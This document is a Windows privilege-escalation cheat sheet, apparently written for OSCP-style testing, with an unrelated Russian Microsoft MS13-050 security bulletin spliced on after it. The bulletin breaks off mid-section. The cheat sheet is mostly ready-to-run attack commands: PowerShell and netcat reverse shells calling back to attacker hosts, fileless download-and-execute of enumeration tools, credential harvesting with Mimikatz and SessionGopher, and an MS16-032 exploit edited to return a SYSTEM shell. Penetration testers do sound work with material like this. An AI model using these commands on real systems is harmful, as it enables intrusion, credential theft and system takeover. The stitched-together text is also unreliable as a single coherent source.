CMD C:> @"%SystemRoot%System32WindowsPowerShellv1.0powershell.exe" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command "&{$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "^> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()}"

Netcat Reverseshell Oneliners for Windows

Sometimes it is helpful to create a new Netcat session from an existed limited shell, webshell or unstable (short lived) remote shell.

Windows Enumeration

NOTE There are many executables that could provide privledge escalation if they are being run by a privledged user, most can be found on the incredible LOLBAS project:
https://lolbas-project.github.io/

Automated Windows Enumeration Scripts

We are also going to look a a few automated methods of performing Windows Enumeration including:

  • WindownPrivEsc.exe
  • Sherlock
  • Watson
  • JAWZ
  • Seatbelt

Running Windows Privesc Check (windows-privesc-check)

The Windows Privesc Check is a very powerful tool for finding common misconfigurations in a Windows system that could lead to privledge escalation. It has not been updated for a while, but it is still as effective today as it was 5 years ago. The downside of this script is that it was written in Python and if the target system does not have Python installed, you will need to use an executable version that has a Python interpreter built in. Having to include Python in the package makes the executable version is pretty large, coming in at a whopping 7.14 MB!!

First we will need to clone the latest version to our environment:

root@kali:~/tools# git clone https://github.com/pentestmonkey/windows-privesc-check
Cloning into 'windows-privesc-check'...
remote: Enumerating objects: 1232, done.
remote: Total 1232 (delta 0), reused 0 (delta 0), pack-reused 1232
Receiving objects: 100% (1232/1232), 34.79 MiB | 4.61 MiB/s, done.
Resolving deltas: 100% (897/897), done.

Next we will need to setup a simple python HTTP webserver in Kali to host the file which the remote Windows box can download it from:

root@kali:~/tools# cd windows-privesc-check/
root@kali:~/tools/windows-privesc-check# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

Now we will need to transfer the file to our remote windows box:

CMD C:> @"%SystemRoot%System32WindowsPowerShellv1.0powershell.exe" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile("http://10.10.10.10/windows-privesc-check2.exe", "C:\Users\Public\Downloads\windows-privesc-check2.exe");

And now we run the executeable on the remote machine. I like run with all the audit enabled like so:

C:UsersAdmin>cd ..
C:Users>cd Public
C:UsersPublic>cd Downloads
C:UsersPublicDownloads>windows-privesc-check2.exe --audit -a -o report
windows-privesc-check v2.0svn198 (http://pentestmonkey.net/windows-privesc-check)...

The windows-privesc-check will create a detailed HTML report and text based report for your review.

Running Sherlock

Sherlock is a powershell library with a number of privledge escalation checkers built in.
We can stage and run sherlock on a remote http server so the file never needs to hit the remote server’s HDD.

root@kali:~test# git clone https://github.com/rasta-mouse/Sherlock.git
Cloning into 'Sherlock'...
remote: Enumerating objects: 3, done.
remote: Counting objects: 100% (3/3), done.
remote: Compressing objects: 100% (3/3), done.
remote: Total 75 (delta 0), reused 2 (delta 0), pack-reused 72
Unpacking objects: 100% (75/75), done.
root@kali:~test# cd Sherlock/
root@kali:~test/Sherlock# ls
LICENSE  README.md  Sherlock.ps1
root@kali:~test/Sherlock# echo Find-AllVulns >> Sherlock.ps1
root@kali:~test/Sherlock# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

Now we can run this from the remote Windows CMD shell:

CMD C:> @"%SystemRoot%System32WindowsPowerShellv1.0powershell.exe" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command "iex ((New-Object System.Net.WebClient).DownloadString('http://10.10.10.10/Sherlock.ps1'))"

Or from a Windows Powershell:

PS C:> IEX(New-Object Net.Webclient).downloadString('http://10.10.10.10/Sherlock.ps1')

Running Watson

Sherlock has been superceded by a .net Windows enumeration platform called Watson which is frequently updated by the author.
It is a bit tricker to deploy and use as you need to compile it yourself and match the version of .net with the target system’s version.

First, on the target system we will need to check the versions of .Net that have been installed by navigating to the .net framework folder and poking around:

cdWindowsMicrosoft.NETFramework
dir /s msbuild

Only active versions of .NET will have the msbuild.exe.
Make note of the available versions and leverage that to compile your version of Watson that targets the remote Windows machine.
Download the latest version of Watson from github:

git clone https://github.com/rasta-mouse/Watson.git

And open it using Visual Studio. In the Solution Explorer, click the Properties and modify the «Target Framework:» value to align with the remote Windows machine’s version of the .Net framework. It will prompt you to reopen the project. Once the project has reloaded, Build the project under the Release mode (CTRL + SHIFT + B).

Next we will copy our Watson.exe to our Kali instance and setup a simple python HTTP webserver in Kali to host the file which the remote Windows box can download it from:

root@kali:~/tools# cd Watson/
root@kali:~/tools/Watson# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

Now we will need to transfer the compiled Watson.exe file to our remote windows box:

CMD C:> @"%SystemRoot%System32WindowsPowerShellv1.0powershell.exe" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile("http://10.10.10.10/Watson.exe", "C:\Users\Public\Downloads\Watson.exe");

And now we run the executeable on the remote machine. I like run with all the audit enabled like so:

C:UsersAdmin>cd ..
C:Users>cd Public
C:UsersPublic>cd Downloads
C:UsersPublicDownloads>Watson.exe

Running JAWS — Just Another Windows (Enum) Script

JAWS is another powershell library that was built with privledge escalation of the OSCP lab machines in mind.
We can stage and run JAWS on a remote http server so the file never needs to hit the remote server’s HDD.

root@kali:~test# git clone https://github.com/411Hall/JAWS

Now we can run this from the remote Windows CMD shell:

CMD C:> @"%SystemRoot%System32WindowsPowerShellv1.0powershell.exe" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command "iex ((New-Object System.Net.WebClient).DownloadString('http://10.10.10.10/jaws-enum.ps1'))"

Or from a Windows Powershell:

PS C:> IEX(New-Object Net.Webclient).downloadString('http://10.10.10.10/jaws-enum.ps1')

And we should see the following output start to appear:

Running J.A.W.S. Enumeration
        - Gathering User Information
        - Gathering Processes, Services and Scheduled Tasks
        - Gathering Installed Software

Fireeye Session Gopher

Leveraging credentials is still the most common ways of privledge escalation in Windows environments. Session Gopher is a PowerShell script designed to automaticlly harvest credentials from commonly used applications.

To run Session Gopher, we will first need to pull down the latest version from the Fireeye github repository:

git clone https://github.com/fireeye/SessionGopher
Cloning into 'SessionGopher'...
remote: Enumerating objects: 48, done.
Unpacking objects: 100% (48/48), done.
remote: Total 48 (delta 0), reused 0 (delta 0), pack-reused 48

Next we can serve it up on our local KALI instance by using the simple python HTTP server:

root@kali:~/tools# cd SessionGopher/
root@kali:~/tools/SessionGopher# ls
README.md  SessionGopher.ps1
root@kali:~/tools/SessionGopher# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

Finally we can file-lessly execute it from our remote Windows shell:

@"%SystemRoot%System32WindowsPowerShellv1.0powershell.exe" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command "iex ((New-Object System.Net.WebClient).DownloadString('http://10.10.10.10/SessionGopher.ps1')); Invoke-SessionGopher -Thorough"

Or from a Windows Powershell:

PS C:> IEX(New-Object Net.Webclient).downloadString('http://10.10.10.10/SessionGopher.ps1')

Or we can download and run it:

CMD C:> @"%SystemRoot%System32WindowsPowerShellv1.0powershell.exe" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile("http://10.10.10.10/SessionGopher.ps1", "C:\Users\Public\Downloads\SessionGopher.ps1");
CMD C:> @"%SystemRoot%System32WindowsPowerShellv1.0powershell.exe" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command "& { . .SessionGopher.ps1; Invoke-SessionGopher -Thorough}"

Running Mimikatz

Mimikatz is a Windows post-exploitation tool written by Benjamin Delpy (@gentilkiwi). It allows for the extraction of plaintext credentials from memory, password hashes from local SAM/NTDS.dit databases, advanced Kerberos functionality, and more.
https://github.com/gentilkiwi/mimikatz

Running traditional (binary) Mimikatz

The original and most frequently updated version of Mimikatz is the binary executable which can be found here:
https://github.com/gentilkiwi/mimikatz/releases

First we will need to download a Mimikatz binary and copy it to the remote machine

root@kali:~/test# wget https://github.com/gentilkiwi/mimikatz/releases/download/2.1.1-20180925/mimikatz_trunk.zip     
--2018-10-16 15:14:49--  https://github.com/gentilkiwi/mimikatz/releases/download/2.1.1-20180925/mimikatz_trunk.zip                     
root@kali:~/test# unzip mimikatz_trunk.zip

Now we will need to copy the 3 files (win32 or x64 depending on the OS) required to run Mimikatz to the remote server.

CMD C:> @"%SystemRoot%System32WindowsPowerShellv1.0powershell.exe" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile("http://10.10.10.10/mimidrv.sys", "C:\Users\Public\Downloads\mimidrv.sys"); (New-Object System.Net.WebClient).DownloadFile("http://10.10.10.10/mimikatz.exe", "C:\Users\Public\Downloads\mimikatz.exe"); (New-Object System.Net.WebClient).DownloadFile("http://10.10.10.10/mimilib.dll", "C:\Users\Public\Downloads\mimilib.dll")"

Now, if we dont have an overly interactive shell, we will want to execute Mimikatz without the built in CLI by passing the correct parameters to the executable. We use the log parameter to also log the clear password results to a file (just in case we are unable to see the output).

mimikatz log version "sekurlsa::logonpasswords" exit

Otherwise we can use the Mimikatz shell to get the passwords:

mimikatz.exe
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords

Running Powershell Mimikatz

The Powershell version is not as frequently updated, but can be loaded into memory without ever hitting the HDD (Fileless execution). This version simply reflectively loads the Mimikatz binary into memory so we could probably update it ourselves without much difficulty.

wget https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1

Fileless execution of Mimikatz from remotely hosted server:

PS C:> IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1') ; Invoke-Mimikatz -DumpCreds

Windows Kernel Exploits

MS16-032

If the remote machine appears to be vulnerable to MS16-032, we can execute a powershell script from a remote server to exploit it.

Title      : Secondary Logon Handle
MSBulletin : MS16-032
CVEID      : 2016-0099
Link       : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable

Get the Powershell script from FuzzySecurity’s Github, add an invoke to the end of the script and share the folder using the python SimpleHTTPServer:

root@kali:~test# git clone https://github.com/FuzzySecurity/PowerShell-Suite.git
Cloning into 'PowerShell-Suite'...
remote: Enumerating objects: 378, done.
remote: Total 378 (delta 0), reused 0 (delta 0), pack-reused 378
Receiving objects: 100% (378/378), 5.94 MiB | 2.06 MiB/s, done.
Resolving deltas: 100% (179/179), done.
root@kali:~test# cd PowerShell-Suite/
root@kali:~test/PowerShell-Suite# echo Invoke-MS16-032 >> Invoke-MS16-032.ps1 
root@kali:~test/PowerShell-Suite# python -m Simple
SimpleDialog        SimpleHTTPServer    SimpleXMLRPCServer  
root@kali:~test/PowerShell-Suite# python -m SimpleHTTPServer 80

The default version of the MS16-032 script will create a Pop-up CMD.exe window on the remote machine. Unfortunatly, we cannot access this from a limited shell… BUT we can modify the exploit to call a reverse shell. Its pretty easy to modify it to call a reverse powershell that will connect back to our machine with a System shell. We will need to modify line 330 of the exploit (the ip address and port will need to be updated of course):

		# LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
		#$CallResult = [Advapi32]::CreateProcessWithLogonW(
		#	"user", "domain", "pass",
		#	0x00000002, "C:WindowsSystem32cmd.exe", "",
		#	0x00000004, $null, $GetCurrentPath,
		#	[ref]$StartupInfo, [ref]$ProcessInfo)

		# Modified to create a Powershell reverse shell 
		$CallResult = [Advapi32]::CreateProcessWithLogonW(
			"user", "domain", "pass",
			0x00000002, 
			'C:WindowsSystem32WindowsPowerShellv1.0powershell.exe', 
			'-NoProfile -InputFormat None -ExecutionPolicy Bypass -Command "&{$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "^> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()}"',
			0x00000004, $null, $GetCurrentPath,
			[ref]$StartupInfo, [ref]$ProcessInfo)

On the remote host execute the exploit:

CMD C:> @"%SystemRoot%System32WindowsPowerShellv1.0powershell.exe" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command "iex ((New-Object System.Net.WebClient).DownloadString('http://10.10.10.10/Invoke-MS16-032.ps1'))"

Or from a Windows Powershell:

PS C:> IEX(New-Object Net.Webclient).downloadString('http://10.10.10.10/Invoke-MS16-032.ps1')

Or if you wanted to upload the exploit, you can always run it like this:

PS C:> powershell -ExecutionPolicy ByPass -command "& { . C:UsersPublicInvoke-MS16-032.ps1; Invoke-MS16-032 }"

On our Kali machine we create the reverse shell and … BOOM! Root dance.

root@kali:~# nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.10.11] from (UNKNOWN) [10.10.10.10] 49182

PS C:Usersjimmy^> whoami
nt authoritysystem

Windows Run As

Prior to successfully performing a Windows run as, we of course need a valid windows username and password.
Here is a oneliner powershell script to verify a username / password is valid on the local system:

Requires .Net 3.5

CMD C:> @"%SystemRoot%System32WindowsPowerShellv1.0powershell.exe" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command "&{$username = '<username here>'; $password = '<password here>'; $computer = $env:COMPUTERNAME; Add-Type -AssemblyName System.DirectoryServices.AccountManagement; $obj = New-Object System.DirectoryServices.AccountManagement.PrincipalContext('machine',$computer); $obj.ValidateCredentials($username, $password); }"

Requires .Net 2.0

CMD C:> @"%SystemRoot%System32WindowsPowerShellv1.0powershell.exe" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command "&{$username = '<username here>'; $password = '<password here>'; $securePassword = ConvertTo-SecureString $password -AsPlainText -Force; $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword; Start-Process -FilePath C:WindowsSystem32calc.exe -NoNewWindow -Credential $credential; }"

Switching users in linux is trival with the SU command. However, an equivalent command does not exist in Windows. Here are 3 ways to run a command as a different user in Windows.

Sysinternals psexec is a handy tool for running a command on a remote or local server as a specific user, given you have thier username and password. The following example creates a reverse shell from a windows server to our Kali box using netcat for Windows and Psexec (on a 64 bit system).

 C:>psexec64 \COMPUTERNAME -u Test -p test -h "c:userspublicnc.exe -nc 192.168.1.10 4444 -e cmd.exe" 
 PsExec v2.2 - Execute processes remotely
 Copyright (C) 2001-2016 Mark Russinovich
 Sysinternals - www.sysinternals.com

Runas.exe is a handy windows tool that allows you to run a program as another user so long as you know thier password. The following example creates a reverse shell from a windows server to our Kali box using netcat for Windows and Runas.exe:

 C:>C:WindowsSystem32runas.exe /env /noprofile /user:Test "c:userspublicnc.exe -nc 192.168.1.10 4444 -e cmd.exe"
 Enter the password for Test:
 Attempting to start nc.exe as user "COMPUTERNAMETest" ...

PowerShell can also be used to launch a process as another user. The following simple powershell script will run a reverse shell as the specified username and password.

 $username = '<username here>'
 $password = '<password here>'
 $securePassword = ConvertTo-SecureString $password -AsPlainText -Force
 $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
 Start-Process -FilePath C:UsersPublicnc.exe -NoNewWindow -Credential $credential -ArgumentList ("-nc","192.168.1.10","4444","-e","cmd.exe") -WorkingDirectory C:UsersPublic

Next run this script using powershell.exe:

CMD C:> powershell -ExecutionPolicy ByPass -command "& { . C:UserspublicPowerShellRunAs.ps1; }"

Other files

Here are few other handy scripts and things…

Capture a screen shot

The following powershell commands can be used to capture a screen shot of the remote computers desktop and store it as a BMP file.

Add-Type -AssemblyName System.Windows.Forms
Add-type -AssemblyName System.Drawing
$Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen
$bitmap = New-Object System.Drawing.Bitmap $Screen.Width, $Screen.Height
$graphic = [System.Drawing.Graphics]::FromImage($bitmap)
$graphic.CopyFromScreen($Screen.Left, $Screen.Top, 0, 0, $bitmap.Size)
$bitmap.Save('screen1.bmp')

If you are on CMD you can use this handy one-liner to execute the same powershell command

@"%SystemRoot%System32WindowsPowerShellv1.0powershell.exe" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command "Add-Type -AssemblyName System.Windows.Forms; Add-type -AssemblyName System.Drawing; $Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen; $bitmap = New-Object System.Drawing.Bitmap $Screen.Width, $Screen.Height; $graphic = [System.Drawing.Graphics]::FromImage($bitmap); $graphic.CopyFromScreen($Screen.Left, $Screen.Top, 0, 0, $bitmap.Size); $bitmap.Save('screen1.bmp')"

CopyAndPasteFileDownloader.bat

Windows file transfer script that can be pasted to the command line. File transfers to a Windows machine can be tricky without a Meterpreter shell. The following script can be copied and pasted into a basic windows reverse and used to transfer files from a web server (the timeout 1 commands are required after each new line)

CopyAndPasteEnum.bat

No File Upload Required Windows Privlege Escalation Basic Information Gathering (based on the fuzzy security tutorial).
Copy and paste the following contents into your remote Windows shell in Kali to generate a quick report

enumeration.md

Basic notes on Windows Enumeration from the OSCP.

windows_recon.bat

An uploadable batch file for performing basic windows enumeration.

References
https://medium.com/@hakluke
https://daya.blog/2018/01/06/windows-privilege-escalation/
https://pentestlab.blog/2017/04/19/stored-credentials/
https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/
https://www.abatchy.com/
https://gist.github.com/egre55
https://github.com/egre55/ultimate-file-transfer-list
https://lolbas-project.github.io/
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
https://github.com/GhostPack/Seatbelt
https://github.com/rasta-mouse/Watson
http://hackingandsecurity.blogspot.com/2017/09/oscp-windows-priviledge-escalation.html
https://blog.ropnop.com/transferring-files-from-kali-to-windows/#smb

TOCTitle Title ms:assetid ms:contentKeyID ms:mtpsurl

MS13-050

Бюллетень по безопасности (Майкрософт) MS13-050 — Важное

ms13-050

61237987

https://technet.microsoft.com/ru-RU/library/ms13-050(v=Security.10)

Security Bulletin

Уязвимость компонентов диспетчера печати Windows делает возможным несанкционированное повышение привилегий (2839894)

Дата публикации: 11 июня 2013 г. | Дата обновления: 16 декабря 2013 г.

Версия: 1.1

Общие сведения

Аннотация

Это обновление для системы безопасности устраняет обнаруженную пользователями уязвимость в Microsoft Windows. Эта уязвимость делает возможным несанкционированное повышение привилегий, если прошедший проверку подлинности злоумышленник удаляет подключение принтера. Чтобы воспользоваться этой уязвимостью, злоумышленник должен иметь действительные учетные данные и возможность входа в систему.

Этому обновлению для системы безопасности присвоен уровень «существенный» в отношении всех поддерживаемых выпусков Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows 8, Windows Server 2012 и Windows RT. Дополнительные сведения см. в подразделе Подвержены и не подвержены уязвимости далее в этом разделе.

Это обновление для системы безопасности устраняет указанную уязвимость, исправляя способ выделения памяти в диспетчере печати Windows при удалении подключения принтера. Дополнительные сведения об этой уязвимости см. в подразделе «Часто задаваемые вопросы» для соответствующей уязвимости в следующем ниже разделе Сведения об уязвимости.

Рекомендация. У большинства клиентов включено автоматическое обновление, поэтому нет необходимости предпринимать какие-либо действия: данное обновление для системы безопасности загрузится и установится автоматически. Клиентам, у которых не включено автоматическое обновление, необходимо проверить наличие обновлений и установить это обновление вручную. Дополнительные сведения об особых параметрах конфигурации автоматического обновления см. в статье 294871 базы знаний Майкрософт.

Администраторам корпоративных установок и конечным пользователям, которые планируют установить это обновление для системы безопасности вручную, корпорация Майкрософт рекомендует сделать это при первой возможности, используя программное обеспечение для управления обновлениями или проверив наличие обновлений через службу обновлений Майкрософт.

См. также раздел Руководство и средства по диагностике и развертыванию этого бюллетеня.

Статья базы знаний

Статья базы знаний 2839894
Сведения о файлах Да
Хэши SHA1/SHA2 Да
Известные проблемы Да

Подвержены и не подвержены уязвимости

Следующие продукты были проверены на наличие уязвимости в тех или иных версиях и выпусках. Прочие версии или выпуски не подвержены уязвимости, либо жизненные циклы их поддержки истекли. Сведения о жизненных циклах поддержки версий или выпусков используемых программных продуктов см. на веб-странице сроков поддержки продуктов Майкрософт.

Подвержены уязвимости

Операционная система Максимальное воздействие уязвимости Общий уровень серьезности Заменяемые обновления
Windows Vista
[Windows Vista с пакетом обновления 2 (SP2)](http://www.microsoft.com/downloads/details.aspx?familyid=ddb864bf-5b0a-46a3-b07f-5714bd136959)
(2839894)
Несанкционированное повышение привилегий Существенный Нет
[Windows Vista x64 Edition с пакетом обновления 2 (SP2)](http://www.microsoft.com/downloads/details.aspx?familyid=112ed313-e2eb-4613-9c69-ee7b56676adf)
(2839894)
Несанкционированное повышение привилегий Существенный Нет
Windows Server 2008
[Windows Server 2008 для 32-разрядных систем с пакетом обновления 2 (SP2)](http://www.microsoft.com/downloads/details.aspx?familyid=995799f3-f4e7-4e5b-9aed-5ec62d06b6ea)
(2839894)
Несанкционированное повышение привилегий Существенный Нет
[Windows Server 2008 с пакетом обновления 2 (SP2) для 64-разрядных систем](http://www.microsoft.com/downloads/details.aspx?familyid=ab227846-c6cc-4ac1-87bc-e5da62df73cc)
(2839894)
Несанкционированное повышение привилегий Существенный Нет
[Windows Server 2008 for Itanium-based Systems с пакетом обновления 2 (SP2)](http://www.microsoft.com/downloads/details.aspx?familyid=ac2a6e07-b568-4b28-9f2b-2209f53c8074)
(2839894)
Несанкционированное повышение привилегий Существенный Нет
Windows 7
[Windows 7 для 32-разрядных систем с пакетом обновления 1 (SP1)](http://www.microsoft.com/downloads/details.aspx?familyid=932eafc1-bf51-4e02-9d54-b7a520db3242)
(2839894)
Несанкционированное повышение привилегий Существенный 2769369 в [MS13-001](http://go.microsoft.com/fwlink/?linkid=273848)
[Windows 7 для компьютеров на базе x64-процессоров с пакетом обновления 1 (SP1)](http://www.microsoft.com/downloads/details.aspx?familyid=15ec4662-a237-42ed-bb4b-3b82eabf1ccd)
(2839894)
Несанкционированное повышение привилегий Существенный 2769369 в [MS13-001](http://go.microsoft.com/fwlink/?linkid=273848)
Windows Server 2008 R2
[Windows Server 2008 R2 для компьютеров на базе x64-процессоров с пакетом обновления 1 (SP1)](http://www.microsoft.com/downloads/details.aspx?familyid=3b6596dd-1159-4088-bcda-13c29507a977)
(2839894)
Несанкционированное повышение привилегий Существенный 2769369 в [MS13-001](http://go.microsoft.com/fwlink/?linkid=273848)
[Windows Server 2008 R2 for Itanium-based Systems с пакетом обновления 1 (SP1)](http://www.microsoft.com/downloads/details.aspx?familyid=68123bbf-4786-4080-87c5-9c5c0caf774a)
(2839894)
Несанкционированное повышение привилегий Существенный 2769369 в [MS13-001](http://go.microsoft.com/fwlink/?linkid=273848)
Windows 8
[Windows 8 для 32-разрядных систем](http://www.microsoft.com/downloads/details.aspx?familyid=b5cf9e24-596f-4a43-b0d0-e36c113334ea)
(2839894)
Несанкционированное повышение привилегий Существенный Нет
[Windows 8 для 64-разрядных систем](http://www.microsoft.com/downloads/details.aspx?familyid=1404b8b9-e3e7-478e-9591-7a7f0804b57a)
(2839894)
Несанкционированное повышение привилегий Существенный Нет
Windows Server 2012
[Windows Server 2012](http://www.microsoft.com/downloads/details.aspx?familyid=3beef4ee-327f-48c2-a7d5-1e3f9e054081)
(2839894)
Несанкционированное повышение привилегий Существенный Нет
Windows RT
Windows RT[1]
(2839894)
Несанкционированное повышение привилегий Существенный Нет
Вариант установки ядра сервера
[Windows Server 2008 для 32-разрядных систем с пакетом обновления 2 (SP2)](http://www.microsoft.com/downloads/details.aspx?familyid=995799f3-f4e7-4e5b-9aed-5ec62d06b6ea) (установка основных серверных компонентов)
(2839894)
Несанкционированное повышение привилегий Существенный Нет
[Windows Server 2008 для 64-разрядных систем с пакетом обновления 2 (SP2)](http://www.microsoft.com/downloads/details.aspx?familyid=ab227846-c6cc-4ac1-87bc-e5da62df73cc) (установка основных серверных компонентов)
(2839894)
Несанкционированное повышение привилегий Существенный Нет
[Windows Server 2008 R2 для 64-разрядных систем с пакетом обновления 1 (SP1)](http://www.microsoft.com/downloads/details.aspx?familyid=3b6596dd-1159-4088-bcda-13c29507a977) (установка основных серверных компонентов)
(2839894)
Несанкционированное повышение привилегий Существенный 2769369 в [MS13-001](http://go.microsoft.com/fwlink/?linkid=273848)
[Windows Server 2012](http://www.microsoft.com/downloads/details.aspx?familyid=3beef4ee-327f-48c2-a7d5-1e3f9e054081) (установка основных серверных компонентов)
(2839894)
Несанкционированное повышение привилегий Существенный Нет

[1]Это обновление доступно в Центре обновления Windows.


Не подвержены уязвимости

Операционная система
Windows XP с пакетом обновления 3 (SP3)
Windows XP Professional x64 Edition с пакетом обновления 2 (SP2)
Windows Server 2003 с пакетом обновления 2 (SP2)
Windows Server 2003 x64 Edition с пакетом обновления 2 (SP2)
Windows Server 2003 for Itanium-based Systems с пакетом обновления 2 (SP2)

Обновленные часто задаваемые вопросы


Я использую Windows Server 2008 (установка основных серверных компонентов), Windows Server 2008 R2 (установка основных серверных компонентов) или Windows Server 2012 (установка основных серверных компонентов), которые перечислены в таблице «Подвержены уязвимости». Почему мне не предлагается обновление 2839894?
Обновление 2839894 предлагается только для систем Windows Server 2008, Windows Server 2008 R2 или Windows Server 2012 в варианте установки основных серверных компонентов с включенным параметром Printing-ServerCore-Role.

На моем компьютере установлена более ранняя версия программного обеспечения, описанного в этом бюллетене по безопасности. Что мне нужно сделать?
Продукты, перечисленные в этом бюллетене, проверены на наличие уязвимости в тех или иных версиях. Жизненные циклы поддержки прочих версий программного обеспечения истекли. Дополнительные сведения о жизненном цикле продуктов см. на веб-странице сроков поддержки продуктов Майкрософт.

Пользователям более ранних версий программного обеспечения следует срочно перейти на поддерживаемые версии, чтобы снизить вероятность наличия в системе уязвимостей. Чтобы определить стадии жизненного цикла поддержки для вашего выпуска программного обеспечения, перейдите на веб-страницу Выберите продукт для отображения информации о стадиях жизненного цикла. Дополнительные сведения о пакетах обновления для этих выпусков программного обеспечения см. на веб-странице политики по срокам поддержки продуктов Microsoft.

Для получения сведений о возможных вариантах обслуживания более ранних версий программного обеспечения свяжитесь с представителем группы по работе с заказчиками корпорации Майкрософт, ее техническим менеджером или представителем соответствующей партнерской компании Майкрософт. Пользователи, у которых нет договора типа Alliance, Premier или Authorized, могут обратиться в местное представительство корпорации Майкрософт. Для получения контактной информации посетите веб-сайт Microsoft Worldwide Information, выберите страну в списке «Контактная информация» и нажмите кнопку Go (Перейти), чтобы просмотреть список телефонных номеров. Дозвонившись, попросите связать вас с менеджером по продажам службы поддержки Premier. Дополнительные сведения см. в разделе Часто задаваемые вопросы о политике поддержки продуктов Майкрософт на разных стадиях жизненного цикла.

Сведения об уязвимости

Уровни серьезности и идентификаторы уязвимостей


Указанные ниже уровни серьезности подразумевают максимальное потенциальное воздействие уязвимости. Сведения о вероятности использования уязвимости в течение 30 дней с момента выпуска данного бюллетеня по безопасности с указанием уровня ее опасности и воздействия см. в указателе использования уязвимостей июньского обзора бюллетеней. Дополнительные сведения см. в индексе использования уязвимостей.

Уровень серьезности уязвимости и максимальное воздействие на систему безопасности

Подвержены уязвимости Уязвимость диспетчера печати (CVE-2013-1339) Общий уровень серьезности
Windows Vista
Windows Vista с пакетом обновления 2 (SP2)
(2839894)
**Существенный**
Несанкционированное повышение привилегий
**Существенный**
Windows Vista x64 Edition с пакетом обновления 2 (SP2)
(2839894)
**Существенный**
Несанкционированное повышение привилегий
**Существенный**
Windows Server 2008
Windows Server 2008 для 32-разрядных систем с пакетом обновления 2 (SP2)
(2839894)
**Существенный**
Несанкционированное повышение привилегий
**Существенный**
Windows Server 2008 с пакетом обновления 2 (SP2) для 64-разрядных систем
(2839894)
**Существенный**
Несанкционированное повышение привилегий
**Существенный**
Windows Server 2008 for Itanium-based Systems с пакетом обновления 2 (SP2)
(2839894)
**Существенный**
Несанкционированное повышение привилегий
**Существенный**
Windows 7
Windows 7 для 32-разрядных систем с пакетом обновления 1 (SP1)
(2839894)
**Существенный**
Несанкционированное повышение привилегий
**Существенный**
Windows 7 для компьютеров на базе x64-процессоров с пакетом обновления 1 (SP1)
(2839894)
**Существенный**
Несанкционированное повышение привилегий
**Существенный**
Windows Server 2008 R2
Windows Server 2008 R2 для компьютеров на базе x64-процессоров с пакетом обновления 1 (SP1)
(2839894)
**Существенный**
Несанкционированное повышение привилегий
**Существенный**
Windows Server 2008 R2 for Itanium-based Systems с пакетом обновления 1 (SP1)
(2839894)
**Существенный**
Несанкционированное повышение привилегий
**Существенный**
Windows 8
Windows 8 для 32-разрядных систем
(2839894)
**Существенный**
Несанкционированное повышение привилегий
**Существенный**
Windows 8 для 64-разрядных систем
(2839894)
**Существенный**
Несанкционированное повышение привилегий
**Существенный**
Windows Server 2012
Windows Server 2012
(2839894)
**Существенный**
Несанкционированное повышение привилегий
**Существенный**
Windows RT
Windows RT
(2839894)
**Существенный**
Несанкционированное повышение привилегий
**Существенный**
Вариант установки ядра сервера
Windows Server 2008 R2 для 64-разрядных систем с пакетом обновления 1 (SP1) (установка основных серверных компонентов)
(2839894)
**Существенный**
Несанкционированное повышение привилегий
**Существенный**
Windows Server 2012 (установка основных серверных компонентов)
(2839894)
**Существенный**
Несанкционированное повышение привилегий
**Существенный**

Уязвимость диспетчера печати (CVE-2013-1339)


Из-за способа обработки памяти диспетчером печати Microsoft Windows при удалении принтера существует уязвимость, приводящая к несанкционированному повышению привилегий.

Чтобы просмотреть стандартную запись об этой уязвимости в списке «Common Vulnerabilities and Exposures», см. CVE-2013-1339.

Смягчающие факторы

